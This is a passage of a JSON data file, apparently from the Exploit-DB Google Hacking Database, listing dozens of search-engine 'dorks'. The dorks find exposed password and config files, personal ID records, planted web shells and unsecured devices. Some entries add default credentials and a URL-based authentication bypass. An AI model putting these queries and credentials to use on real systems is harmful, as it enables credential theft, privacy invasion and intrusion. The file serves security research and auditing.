passwords", "querystring": "http://www.google.com/search?q=filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "shortDescription": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "textualDescription": "Backup or temp versions of php files containing you guessed it passwords or\nother ripe for the picking info...\nAuthor: Bastich" }, { "signatureReferenceNumber": "3747", "link": "https://www.exploit-db.com/ghdb/3747/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"trace.axd\" ext:axd \"Application Trace\"", "shortDescription": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "textualDescription": "example google dork to find trace.axd, a file used for debugging asp that\nreveals full http request details like cookie and other data that in many\ncases can be used to hijack user-sessions, display plain-text\nusernames/passwords and also serverinfo like pathnames\nsecond with plain-text usernames and passwords along with sessiondata. this\nfile should be developer-only and not publicly available but seems to be\nused quite often, usually hidden from google with robots.txt. Author: easypwn" }, { "signatureReferenceNumber": "3748", "link": "https://www.exploit-db.com/ghdb/3748/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"/includes/config.php\"", "shortDescription": "inurl:\"/includes/config.php\"", "textualDescription": "The Dork Allows you to get data base information from config files. Author: XeNon" }, { "signatureReferenceNumber": "3749", "link": "https://www.exploit-db.com/ghdb/3749/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:index.of? configuration.php.zip", "shortDescription": "intitle:index.of? configuration.php.zip", "textualDescription": "this dork finds mostly backed up configuration.php files.\nIts possible to change the *.zip to *.txt or other file types.\nAuthor: Lord.TMR" }, { "signatureReferenceNumber": "3750", "link": "https://www.exploit-db.com/ghdb/3750/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:\"/Application%20Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "shortDescription": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "textualDescription": "this dork locates files containing ftp passwords" }, { "signatureReferenceNumber": "3751", "link": "https://www.exploit-db.com/ghdb/3751/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "shortDescription": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "textualDescription": "this dork locates registry dumps" }, { "signatureReferenceNumber": "3752", "link": "https://www.exploit-db.com/ghdb/3752/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "shortDescription": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "textualDescription": "locates cpanel and ftp cracker. Author: alsa7r" }, { "signatureReferenceNumber": "3753", "link": "https://www.exploit-db.com/ghdb/3753/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/xampp", "shortDescription": "inurl:/xampp", "textualDescription": "this dork looks for servers with xampp installed" }, { "signatureReferenceNumber": "3754", "link": "https://www.exploit-db.com/ghdb/3754/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "shortDescription": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "textualDescription": "this dork locates backed up config files\nfiletype:php~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:bak (define)(DB_USER|DB_PASS|DB_NAME)\n \nAuthor: Gerald J. Pottier III" }, { "signatureReferenceNumber": "3755", "link": "https://www.exploit-db.com/ghdb/3755/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:old (mysql_connect) ()", "shortDescription": "filetype:old (mysql_connect) ()", "textualDescription": "There are three of mysql_connects but that all search in .inc or\nwarnings, non search for .old . Dot old is something that all devs to\nto hide old files they do not want to delete immediatly but almost\nalways forget to delete. The server lang can be changed.\n\n\n:D\n-- \nGerald J. Pottier III\nSenior Managed Systems Engineer :STG inc.\nHereford, AZ 85615\n[Home] 520.843.0135\n[Work] 520.538.9684" }, { "signatureReferenceNumber": "3756", "link": "https://www.exploit-db.com/ghdb/3756/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "shortDescription": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "textualDescription": "This search attempts to find the c99 backdoor that may be knowingly or\nunknowingly installed on servers. I have refined the search in hopes that\nmore general talk about the backdoor, and also talk about the marijuana\nstrain does not pollute the results quite as much.\nAuthor: Teague Newman" }, { "signatureReferenceNumber": "3757", "link": "https://www.exploit-db.com/ghdb/3757/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=filetype:php inurl:tiki-index.php +sirius +1.9.*", "shortDescription": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "textualDescription": "Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones" }, { "signatureReferenceNumber": "3758", "link": "https://www.exploit-db.com/ghdb/3758/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:\"UniMep Station Controller\"", "shortDescription": "allintitle:\"UniMep Station Controller\"", "textualDescription": "UniMep is a device for managing fuel station. You can see process of\nfueling cars and you can make some changes in the setting.\nThe default username/password is admin/setup. Author: WBR rigan" }, { "signatureReferenceNumber": "3759", "link": "https://www.exploit-db.com/ghdb/3759/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/makecgi-pro", "shortDescription": "inurl:/cgi-bin/makecgi-pro", "textualDescription": "Brings up listings for Iomgea NAS devices.\nPassword protected folders are susceptible to authentication bypass by\nadding the following to the url (after /cgi-bin/make-cgi-pro):\n?page_value=page_files&tab_value=%20&task_value=task_gotoPath¶m1_value=(foldername)\nCommon folders are music, movies, photos & public. Author: Matt Jones" }, { "signatureReferenceNumber": "3760", "link": "https://www.exploit-db.com/ghdb/3760/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=\"My RoboForm Data\" \"index of\"", "shortDescription": "\"My RoboForm Data\" \"index of\"", "textualDescription": "This dork looks for Roboform password files. Author: Robert McCurdy" }, { "signatureReferenceNumber": "3761", "link": "https://www.exploit-db.com/ghdb/3761/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:sql inurl:wp-content/backup-*", "shortDescription": "filetype:sql inurl:wp-content/backup-*", "textualDescription": "Search for WordPress MySQL database backup. Author: AngelParrot" }, { "signatureReferenceNumber": "3762", "link": "https://www.exploit-db.com/ghdb/3762/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allintext:D.N.I+Numero", "shortDescription": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "textualDescription": "This dork locates social security numbers. Author: Luciano UNLP" }, { "signatureReferenceNumber": "3763", "link": "https://www.exploit-db.com/ghdb/3763/", "category": "Files containing juicy info", "querystring": "https://www.google.com/search?q=inurl:Curriculum%20Vitale%20filetype:doc", "shortDescription": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "textualDescription": "This dork locates Curriculum Vitale files. Author: Luciano UNLP" }, { "signatureReferenceNumber": "3764", "link": "https://www.exploit-db.com/ghdb/3764/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=Microsoft-IIS/7.0 intitle:index.of name size", "shortDescription": "Microsoft-IIS/7.0 intitle:index.of name size", "textualDescription": "IIS 7 directory listing. Author: huang" }, { "signatureReferenceNumber": "3765", "link": "https://www.exploit-db.com/ghdb/3765/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allinurl:telefonos filetype:xls", "shortDescription": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "textualDescription": "This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP" }, { "signatureReferenceNumber": "3766", "link": "https://www.exploit-db.com/ghdb/3766/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "shortDescription": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "textualDescription": "This search attempts to find the BOFF 1.0 Shell. Author: alsa7r" }, { "signatureReferenceNumber": "3767", "link": "https://www.exploit-db.com/ghdb/3767/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:SpectraIV-IP", "shortDescription": "intitle:SpectraIV-IP", "textualDescription": "Google dork for pelco SpectraIV-IP Dome Series cameras\nDefault username/password \"admin/admin\". Author: GhOsT-PR" }, { "signatureReferenceNumber": "3768", "link": "https://www.exploit-db.com/ghdb/3768/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"Powered by kryCMS\"", "shortDescription": "\"Powered by kryCMS\"", "textualDescription": "kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan" }, { "signatureReferenceNumber": "3769", "link": "https://www.exploit-db.com/ghdb/3769/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allintext:D.N.I filetype:xls", "shortDescription": "allintext:D.N.I filetype:xls", "textualDescription": "This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !\nAuthor: Luciano UNLP" }, { "signatureReferenceNumber": "3770", "link": "https://www.exploit-db.com/ghdb/3770/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "shortDescription": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "textualDescription": "Logged username, passwords, hashes\nAuthor: GhOsT-PR" }, { "signatureReferenceNumber": "3771", "link": "https://www.exploit-db.com/ghdb/3771/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "shortDescription": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "textualDescription": "Gateway Routers\nAuthor: GhOsT-PR" }, { "signatureReferenceNumber": "3772", "link": "https://www.exploit-db.com/ghdb/3772/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:cgi-bin/cosmobdf.cgi?", "shortDescription": "inurl:cgi-bin/cosmobdf.cgi?", "textualDescription": "COSMOView for building management. Author: GhOsT-PR" }, { "signatureReferenceNumber": "3773", "link": "https://www.exploit-db.com/ghdb/3773/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "shortDescription": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "textualDescription": "DIY-CMS blog mod SQL Injection. Author: snup" }, { "signatureReferenceNumber": "3774", "link": "https://www.exploit-db.com/ghdb/3774/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "shortDescription": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "textualDescription": "ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK" }, { "signatureReferenceNumber": "3775", "link": "https://www.exploit-db.com/ghdb/3775/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:wp-content/plugins/age-verification/age-verification.php", "shortDescription": "inurl:wp-content/plugins/age-verification/age-verification.php", "textualDescription": "Wordpress Age Verification Plugin \nhttp://www.exploit-db.com/exploits/18350" }, { "signatureReferenceNumber": "3776", "link": "https://www.exploit-db.com/ghdb/3776/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"HtmlAnvView:D7B039C1\"", "shortDescription": "intitle:\"HtmlAnvView:D7B039C1\"", "textualDescription": "This dork finds Wireless Security/Webcams that are accessible from the \nweb. The interesting part is that for some reason these cameras do not \ngenerally allow users to remove/change the default administrative \nusername and pass. So in most cases you can view any camera that shows \nup in the google search.\n\nDefault Username: admin01\nDefault Password: 000000\n 111111\n 999999\n\nAuthor: Paul White" }, { "signatureReferenceNumber": "3777", "link": "https://www.exploit-db.com/ghdb/3777/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"~~Joomla1.txt\" title:\"Index of /\"", "shortDescription": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "textualDescription": "intext:\"~~Joomla1.txt\" title:\"Index of /\"\n\n\nGet all server configs files\n\nDiscovered by alsa7r" }, { "signatureReferenceNumber": "3778", "link": "https://www.exploit-db.com/ghdb/3778/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=\"Welcome to Sitecore\" + \"License Holder\"", "shortDescription": "\"Welcome to Sitecore\" + \"License Holder\"", "textualDescription": "Sitecore CMS detection." }, { "signatureReferenceNumber": "3779", "link": "https://www.exploit-db.com/ghdb/3779/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:\"-N3t\" filetype:php undetectable", "shortDescription": "intitle:\"-N3t\" filetype:php undetectable", "textualDescription": "intitle:\"-N3t\" filetype:php undetectable\nSearch WebShell indexed on a page.\n\n-- \nJoel Campusano Rojas.\n632 161 62\n@joelcampusano\nIngeniero Civil en Inform\ufffdtica." }, { "signatureReferenceNumber": "3780", "link": "https://www.exploit-db.com/ghdb/3780/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=?intitle:index.of?\".mysql_history\"", "shortDescription": "?intitle:index.of?\".mysql_history\"", "textualDescription": "Find some juicy info in .mysql_history files\n\nenjoy\nbastich" }, { "signatureReferenceNumber": "3781", "link": "https://www.exploit-db.com/ghdb/3781/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:awen+intitle:asp.net", "shortDescription": "intitle:awen+intitle:asp.net", "textualDescription": "Hi,\n\nThis google dork exposes any already uploaded asp.net shells which are\navailable in BackTrack.\nhttp://www.google.com/search?q=intitle:awen+intitle:asp.net\n\nThanks,\nSagar Belure" }, { "signatureReferenceNumber": "3782", "link": "https://www.exploit-db.com/ghdb/3782/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=\"mailing list memberships reminder\"", "shortDescription": "\"mailing list memberships reminder\"", "textualDescription": "Hi,\n\nBy default, while subscribing to a mailing list on a website, running\nMailman (GNU) for mailing list management, the user has got options to\nmanage his/her subscription options.\nThere is an option of getting password reminder email for this list\nonce in a month.\nAnd, by default, this option is set to Yes.\nAlong with sending the password reminder mail in *plain text* to the\nusers, it gets archived on the sites too.\n\nThanks,\nSagar Belure" }, { "signatureReferenceNumber": "3783", "link": "https://www.exploit-db.com/ghdb/3783/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "shortDescription": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "textualDescription": "This dork can fetch you Avast product licenses especially Avast Antiviruses\n, including Professional editions ;)\nAuthor: gr00ve_hack3r\nwww.gr00ve-hack3r.com" }, { "signatureReferenceNumber": "3784", "link": "https://www.exploit-db.com/ghdb/3784/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "shortDescription": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "textualDescription": "The server vulnerable to => CVE 2006-4602" }, { "signatureReferenceNumber": "3785", "link": "https://www.exploit-db.com/ghdb/3785/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "shortDescription": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "textualDescription": "PHP Error Messages" }, { "signatureReferenceNumber": "3786", "link": "https://www.exploit-db.com/ghdb/3786/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:cfg \"radius\" (pass|passwd|password)", "shortDescription": "filetype:cfg \"radius\" (pass|passwd|password)", "textualDescription": "Find config files with radius configs and passwords and secrets...\n\nLove\nBastich" }, { "signatureReferenceNumber": "3787", "link": "https://www.exploit-db.com/ghdb/3787/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:Settings.aspx intitle:Beyond TV", "shortDescription": "inurl:Settings.aspx intitle:Beyond TV", "textualDescription": "Beyond TV gives you the capability to turn your PC into a high quality,\ndigital video recorder (DVR). Most people use it for cable TV so that\nthey don't have to spend rent money on a low end quality hardware DVR\nfrom their cable company. It's default config has no password or\nusername enabled. Very bad for people who connect their PCs directly to\ntheir modems. I have Beyond TV and I was curious on how secure it is." }, { "signatureReferenceNumber": "3788", "link": "https://www.exploit-db.com/ghdb/3788/", "category": "Pages containing login portals", "querystring": "https://www.google.com/#hl=en&output=search&sclient=psy-ab&q=inurl:%22cgi-bin%2Fwebcgi%2Fmain%22", "shortDescription": "inurl:\"cgi-bin/webcgi/main\"", "textualDescription": "inurl:\"cgi-bin/webcgi/main\"\n\nThis dork finds indexed public facing Dell Remote Access Card.\n\n-n17r0u6" }, { "signatureReferenceNumber": "3789", "link": "https://www.exploit-db.com/ghdb/3789/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "shortDescription": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "textualDescription": "This dork finds unsecured databases" }, { "signatureReferenceNumber": "3790", "link": "https://www.exploit-db.com/ghdb/3790/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "shortDescription": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "textualDescription": "Hack the $cr1pt kiddies.\n\nThere are a lot of Phishing pages hosted on internet , this dork will\nprovide you with their password files. Clean and Simple\n\ngr00ve_hack3r\nwww.gr00vehack3r.wordpress.com" }, { "signatureReferenceNumber": "3791", "link": "https://www.exploit-db.com/ghdb/3791/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:docx Domain Registrar $user $pass", "shortDescription": "filetype:docx Domain Registrar $user $pass", "textualDescription": "Dork :- *filetype:docx Domain Registrar $user $pass*\nUse :- *To find domain login password for Registrar (can Hijack Domain)\n\nSubmitted by : G00g!3 W@rr!0r\n*" }, { "signatureReferenceNumber": "3792", "link": "https://www.exploit-db.com/ghdb/3792/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/app_dev.php/login \"Environment\"", "shortDescription": "inurl:/app_dev.php/login \"Environment\"", "textualDescription": "Search for login screen in web aplications developed with Symfony2 in a development environment\n\nDaniel Maldonado\nhttp://caceriadespammers.com.ar" }, { "signatureReferenceNumber": "3793", "link": "https://www.exploit-db.com/ghdb/3793/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"hp laserjet\" inurl:info_configuration.htm", "shortDescription": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "textualDescription": "HP LaserJet printers" }, { "signatureReferenceNumber": "3794", "link": "https://www.exploit-db.com/ghdb/3794/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:avastlic", "shortDescription": "filetype:avastlic", "textualDescription": "Lots of Avast Licenses .\nAuthor : gr00ve_hack3r\nwww.gr00vehack3r.wordpress.com" }, { "signatureReferenceNumber": "3795", "link": "https://www.exploit-db.com/ghdb/3795/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Log In\" \"Access unsecured content without logging in\"", "shortDescription": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "textualDescription": "iOmega Storcenter login page:\n\nintitle:\"Log In\" \"Access unsecured content without logging in\"\n\nGreetings,\nAlrik" }, { "signatureReferenceNumber": "3796", "link": "https://www.exploit-db.com/ghdb/3796/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Please-logon \"intitle:zarafa webaccess \"", "shortDescription": "Please-logon \"intitle:zarafa webaccess \"", "textualDescription": "Zarafa Webaccess logon pages.\n\nGreetings,\nAlrik." }, { "signatureReferenceNumber": "3797", "link": "https://www.exploit-db.com/ghdb/3797/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "shortDescription": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "textualDescription": "\"CHARACTER_SETS\"+\"COLLATION_CHARACTER_SET_APPLICABILITY\"\nfind sql injectable site\n\ndiscoverd by shinrisama" }, { "signatureReferenceNumber": "3798", "link": "https://www.exploit-db.com/ghdb/3798/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"DVR+Web+Client\"", "shortDescription": "intitle:\"DVR+Web+Client\"", "textualDescription": "This dork will find most Linux-based DVR web clients that are accessible to\nthe web and through SSH. Linux-based DVR web clients are login portals for\nsurveillance web cameras wherein you can spy in other peoples cameras.\n\n*Default Usernames:* admin, guest, root\n*Default Passwords:* admin, guest, root\n\n*Author:* shipcode" }, { "signatureReferenceNumber": "3799", "link": "https://www.exploit-db.com/ghdb/3799/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=site*.*.*/webalizer intitle:\"Usage Statistics\"", "shortDescription": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "textualDescription": "Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first." }, { "signatureReferenceNumber": "3800", "link": "https://www.exploit-db.com/ghdb/3800/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "shortDescription": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "textualDescription": "Still find alot of equipment running v24 sp1" }, { "signatureReferenceNumber": "3801", "link": "https://www.exploit-db.com/ghdb/3801/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:charset_test= email= default_persistent=", "shortDescription": "intext:charset_test= email= default_persistent=", "textualDescription": "find facebook email and password ;)" }, { "signatureReferenceNumber": "3802", "link": "https://www.exploit-db.com/ghdb/3802/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q='apc info' 'apc.php?SCOPE='", "shortDescription": "'apc info' 'apc.php?SCOPE='", "textualDescription": "This dork will locate Unsecured PHP APC Installations.\n\nWith regards,\nShubham Mittal\n(Hack Planet Technologies)\nhttp://hackplanet.in" }, { "signatureReferenceNumber": "3803", "link": "https://www.exploit-db.com/ghdb/3803/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intext: intext: intext: intext: intext:", "shortDescription": "intext: intext: intext: intext: intext:", "textualDescription": "More than 100k sites affected\n\nIt will show asp sites that are vulnerable to sql injection\n(These links actually show pages which are attacked by mass Sql\nInjection...which means they are vulnerable to sql Injection)\n #Author\n ----- pgolecha\n Palash Golecha\n twitter- @pgolecha12" }, { "signatureReferenceNumber": "3804", "link": "https://www.exploit-db.com/ghdb/3804/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:xml (\"mode_passive\"|\"mode_default\")", "shortDescription": "ext:xml (\"mode_passive\"|\"mode_default\")", "textualDescription": "OffSec:\n\nSo the dork is:\n\next:xml (\"mode_passive\"|\"mode_default\")\n\nThis dork finds Filezilla XML files.\ufffd To be more specific;\n\n\ufffd\ufffd\ufffd recentservers.xml\n\ufffd\ufffd\ufffd sitemanager.xml\n\ufffd\ufffd\ufffd filezilla.xml\n\nThese files contain clear text usernames and passwords.\ufffd They also contain the hostname or IP to connect to as well as the port.\ufffd Most of these results will be for FTP however, you can also get port 22 to SSH in.\ufffd This dork of course can be modified to target a specific website by appending site:whateversite.com.\ufffd You can also look for a specific username like root by appending \"root\" to the dork.\ufffd\ufffd\n\nRegards,\n\nnecrodamus\n\nhttp://www.twitter.com/necrodamus2600\nhttp://www.photobucket.com/profile/necrodamus2600" }, { "signatureReferenceNumber": "3805", "link": "https://www.exploit-db.com/ghdb/3805/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:xls \"username | password\"", "shortDescription": "filetype:xls \"username | password\"", "textualDescription": "filetype:xls \"username | password\" This search reveals usernames and/or passwords of the xls documents.\n\n\nby Stakewinner00" }, { "signatureReferenceNumber": "3806", "link": "https://www.exploit-db.com/ghdb/3806/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "shortDescription": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "textualDescription": "Dork: inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"\n\nUse this dork to find root directory of CKFinder (all versions) with\nckfinder.html file (used to upload, modify and delete files on the server)\n\nSubmitted by: CodiObert" }, { "signatureReferenceNumber": "3807", "link": "https://www.exploit-db.com/ghdb/3807/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:Priv8 SCR", "shortDescription": "intitle:Priv8 SCR", "textualDescription": "I am Un0wn_X\n\nSymlink User configs\n\nintitle:Priv8 SCR" }, { "signatureReferenceNumber": "3808", "link": "https://www.exploit-db.com/ghdb/3808/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:C0ded By web.sniper", "shortDescription": "intitle:C0ded By web.sniper", "textualDescription": "User & Domain || Symlink\nUsing this dork you can find the User and the Domains of the Server...\n\nintitle:C0ded By web.sniper\n\nAuthor: Un0wn_X" }, { "signatureReferenceNumber": "3809", "link": "https://www.exploit-db.com/ghdb/3809/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:.com/configuration.php-dist", "shortDescription": "inurl:.com/configuration.php-dist", "textualDescription": "Finds the configuration files of the PHP Database on the server.\nBy\nChintan GurjarRahul Tygi" }, { "signatureReferenceNumber": "3810", "link": "https://www.exploit-db.com/ghdb/3810/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=Pyxis Mobile Test Page", "shortDescription": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "textualDescription": "Pyxis Mobile Test Page\n\nintitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"" }, { "signatureReferenceNumber": "3811", "link": "https://www.exploit-db.com/ghdb/3811/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:finger.cgi", "shortDescription": "inurl:finger.cgi", "textualDescription": "Finger\n\nSubmitted by: Christy Philip Mathew" }, { "signatureReferenceNumber": "3812", "link": "https://www.exploit-db.com/ghdb/3812/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:32400/web/index.html", "shortDescription": "inurl:32400/web/index.html", "textualDescription": "Submitting this for the GHDB. These are web accessible Plex Media Servers\nwhere you can watch/listen to other people's media collections.\n\nFYI" }, { "signatureReferenceNumber": "3813", "link": "https://www.exploit-db.com/ghdb/3813/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "shortDescription": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "textualDescription": "This dork is based on this: http://www.exploit-db.com/ghdb/1212/\n but improved cause that is useless, instead of this:\n \"parent directory\" proftpdpasswd intitle:\"index of\" -google\n\n Best regards,\n\n Nemesis" }, { "signatureReferenceNumber": "3814", "link": "https://www.exploit-db.com/ghdb/3814/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "shortDescription": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "textualDescription": "This dork finds web interfaces of various routers using custom firmware DD-WRT.\n Default login: root\n Default password: admin\n\n greetings, uA" }, { "signatureReferenceNumber": "3815", "link": "https://www.exploit-db.com/ghdb/3815/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/level/13|14|15/exec/\"", "shortDescription": "inurl:\"/level/13|14|15/exec/\"", "textualDescription": "inurl:\"/level/13|14|15/exec/\"\n\nCisco IOS HTTP Auth Vulnerability .. Command before exec/ . Example\nexec/-/?" }, { "signatureReferenceNumber": "3816", "link": "https://www.exploit-db.com/ghdb/3816/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:\"r00t.php\"", "shortDescription": "inurl:\"r00t.php\"", "textualDescription": "This dork finds websites that were hacked, backdoored and contains their \nsystem information e.g: Linux web.air51.ru 2.6.32-41-server #89-Ubuntu\nSMP Fri Apr 27 22:33:31 UTC 2012 x86_64.\n\n\nJay Turla a.k.a shipcode" }, { "signatureReferenceNumber": "3817", "link": "https://www.exploit-db.com/ghdb/3817/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:\"/dbman/default.pass\"", "shortDescription": 